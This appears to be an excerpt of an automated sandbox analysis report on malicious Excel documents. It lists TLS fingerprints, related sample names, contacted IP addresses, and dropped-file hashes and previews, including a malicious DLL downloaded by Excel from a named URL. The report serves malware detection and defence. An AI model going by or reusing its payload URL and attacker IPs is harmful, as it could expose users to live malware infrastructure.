                                                                                                                                  JA3 Fingerprints

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  05af1f5ca1b87cc9cc9b25185115607dSecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  AWB783079370872.docmGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  document-750895311.xlsGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10048.21085.xlsGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10048.15397.xlsGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10048.29300.xlsGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  DocuSign_167.xlsGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  DocuSign_139380140_1184163298.xlsGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  index_2021-02-17-11_45.dllGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  PO.xlsGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  JF0qFPqOqZ.docxGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10048.426.xlsGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  Quotes.xlsmGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  IMG_51067.doc__.rtfGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  Request for Quotation76584454.pptGet hashmaliciousBrowse
                                                                                                                                  • 176.58.123.25
                                                                                                                                  8c4a22651d328568ec66382a84fc505fSecuriteInfo.com.Exploit.Siggen3.10350.14349.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Heur.11712.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96
                                                                                                                                  SecuriteInfo.com.Heur.28224.xlsGet hashmaliciousBrowse
                                                                                                                                  • 45.155.173.242
                                                                                                                                  • 193.8.194.96

                                                                                                                                  Dropped Files

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesSecuriteInfo.com.Exploit.Siggen3.10350.14349.xlsGet hashmaliciousBrowse
                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsGet hashmaliciousBrowse
                                                                                                                                      SecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                                                        SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsGet hashmaliciousBrowse
                                                                                                                                          SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                                                              SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                                                                SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                                                                      SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                                                        SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                                                                          SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                                                                            SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                                                                              SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                                                                                SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                                                                                  SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                                                                    SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                                                      SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                                                                        Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                                                          C:\Users\user\BASE.BABAASecuriteInfo.com.Exploit.Siggen3.10350.14349.xlsGet hashmaliciousBrowse
                                                                                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsGet hashmaliciousBrowse
                                                                                                                                                                              SecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                                                                                                SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                    SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                      SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                        SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                            SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                              SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                Sign-636.xlsGet hashmaliciousBrowse

                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):59134
                                                                                                                                                                                                                  Entropy (8bit):7.995450161616763
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                                                                                                                                                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                                                                                                                                                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                                                                                                                                                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                                                                                                                                                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):893
                                                                                                                                                                                                                  Entropy (8bit):7.366016576663508
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                                                                                                                                                                  MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                                                                                                                                                                  SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                                                                                                                                                                  SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                                                                                                                                                                  SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                                                  Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):3.0908522464605643
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:kKwaPbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:3W3kPlE99SNxAhUeo+aKt
                                                                                                                                                                                                                  MD5:DBAC0F4F367066518103C7836B446107
                                                                                                                                                                                                                  SHA1:624845187C47C0AB5B186CFFD05A74E7FA8D7A71
                                                                                                                                                                                                                  SHA-256:283E817992CADBAF9E3198C1B7181C08D172F7719C2ACDD25F5806891A41E374
                                                                                                                                                                                                                  SHA-512:9B3ACF465E611D6BCB8206F160B704FDFE7B24D1436FFCA21B64E744A1750F5EED0B508769193876CBA13EE544F62F64140EC4DA48E6F9554E872C2B11EA31B0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: p...... .........L.....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):252
                                                                                                                                                                                                                  Entropy (8bit):3.018531379206123
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:kkFklYQltfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKtwnliBAIdQZV7eAYLit
                                                                                                                                                                                                                  MD5:89B0055866A7A1585BBC1D3FAE86B411
                                                                                                                                                                                                                  SHA1:FB63F73ADD62C9D5957D10076F740E9CC1AAEABF
                                                                                                                                                                                                                  SHA-256:6D57DC7645218A8D6260AA82625BD20D81AD51810CFD7EA71909CFF154F3FFCD
                                                                                                                                                                                                                  SHA-512:C0E2214F8CA852832058F16A669707C408BD442203926DD656E4007430AED448480FFDA6F0185DF488A97C73CF786F12114911B88D77F8B0DE8C4DE9CA8B7C70
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: p...... ....`....u......(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):4591104
                                                                                                                                                                                                                  Entropy (8bit):5.0540147937501265
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                                                                                                  MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                                                                                                  SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                                                                                                  SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                                                                                                  SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                  • Antivirus: Metadefender, Detection: 11%, Browse
                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 41%
                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                  IE Cache URL:http://www.chipmania.it/mails/open.php
                                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\B7DE0000
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):155530
                                                                                                                                                                                                                  Entropy (8bit):7.660456700199465
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXs:YEGSzx0dmxk7RbsYsKtseoXc
                                                                                                                                                                                                                  MD5:0395050B4CB895A16AD84F8E70C521ED
                                                                                                                                                                                                                  SHA1:4B7903E8FF8F55C8A2B2C677A715411F2AA1558B
                                                                                                                                                                                                                  SHA-256:F9A0EA7DBEC7B9BEBA16AEB7412DF72087B2736159C3B2F314A8978B5DC42504
                                                                                                                                                                                                                  SHA-512:C34CCB734CD14F5C286A2B071822392274BD282E8AF45A3388CBBA60CD4D54FC2B8D9544ADB8F6088116DDF3197E3204A6255CD1E7959023CA9E84FB2DD10D8B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ...n.0.E.......D'.....E....I?.&..k..a...;...5.K....{..H......"j.Zv..X.Nz.]..._..$...;h....,..?l.`E..[..>q...+......|.".m.x.r-:......K.R...[..J<.T.n....R;V}..Q-.!.-E"...#H.W+-Ay.hI...A(...5M.....R......#...tY8....Q..}%..,.`....r..*..^.}.wja...;..7a.^|c.......H....6.LSj.X!..ubi..v/..J$.r.....39...I...Q|O5r..w.T...|.c..O........0m...\..n':D.E.u..O....?..|.(........{...1...&.........1}.}@.."L.....]....4....u .t..<.\ .S...6/...........PK..........!..#|.....X.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Cab563C.tmp
                                                                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):59134
                                                                                                                                                                                                                  Entropy (8bit):7.995450161616763
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                                                                                                                                                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                                                                                                                                                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                                                                                                                                                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                                                                                                                                                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Tar563D.tmp
                                                                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):152788
                                                                                                                                                                                                                  Entropy (8bit):6.316654432555028
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                                                                                                                                                                  MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                                                                                                                                                                  SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                                                                                                                                                                  SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                                                                                                                                                                  SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
